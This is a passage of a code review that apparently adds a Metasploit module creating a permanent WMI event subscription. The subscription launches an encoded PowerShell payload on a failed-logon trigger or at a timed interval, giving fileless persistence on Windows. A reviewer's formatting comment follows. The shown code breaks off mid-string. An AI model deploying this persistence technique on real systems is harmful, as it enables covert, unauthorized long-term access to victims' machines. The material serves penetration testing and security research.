modules/exploits/windows/local/wmi_persistence.rb

```diff
@@ -0,0 +1,152 @@
+require 'msf/core/post/file'
+
+class MetasploitModule < Msf::Exploit::Local
+
+  include Msf::Post::Windows::Powershell
+  include Msf::Exploit::Powershell
+  include Post::Windows::Priv
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'             => 'WMI Event Subscription Persistence',
+      'Description'      => %q{
+          This module will create a permanent WMI event subscription to achieve file-less persistence using one
+          of two methods. The USERNAME method will create an event filter that will query the event log for an
+          EVENT_ID_TRIGGER (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER.
+          When these criteria are met a command line event consumer will trigger an encoded powershell payload.
+          The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL.
+          This module requires administrator level privileges as well as a high integrity process. It is also
+          recommended not to use stageles payloads due to powershell script length limitations.
+        },
+      'Author'           => ['Nick Tyrer <@NickTyrer>'],
+      'License'          => MSF_LICENSE,
+      'Privileged'       => true,
+      'Platform'         => 'win',
+      'SessionTypes'  => ['meterpreter'],
+      'Targets'       => [['Windows', {}]],
+      'DisclosureDate' => 'Jun 6 2017',
+      'DefaultTarget'    => 0,
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true'
+        },
+      'References' => [
+        ['URL', 'https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf'],
+        ['URL', 'https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/']
+      ]
+    ))
+
+    register_options([
+      OptEnum.new('PERSISTENCE_METHOD',
+        [true, 'Method to trigger the payload.', 'USERNAME', ['USERNAME','INTERVAL']]),
+      OptInt.new('EVENT_ID_TRIGGER',
+        [true, 'Event ID to trigger the payload. (Default: 4625)', 4625]),
+      OptString.new('USERNAME_TRIGGER',
+        [true, 'The username to trigger the payload. (Default: BOB)', 'BOB' ]),
+     OptInt.new('CALLBACK_INTERVAL',
+        [true, 'Time between callbacks (In milliseconds). (Default: 1800000).', 1800000 ]),
+      OptString.new('CLASSNAME',
+        [true, 'WMI event class name. (Default: UPDATER)', 'UPDATER' ])
+    ])
+  end
+
+
+  def build_payload
+   cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+  end
+
+
+  def subscription_user
+   command = build_payload
+   event_id = datastore['EVENT_ID_TRIGGER']
+   username = datastore['USERNAME_TRIGGER']
+   class_name = datastore['CLASSNAME']
+
+"auditpol.exe /set /subcategory:Logon /failure:Enable
```

Comment:
Please clean up the formatting on this string. if internal formatting is important, than I recommend using a heredoc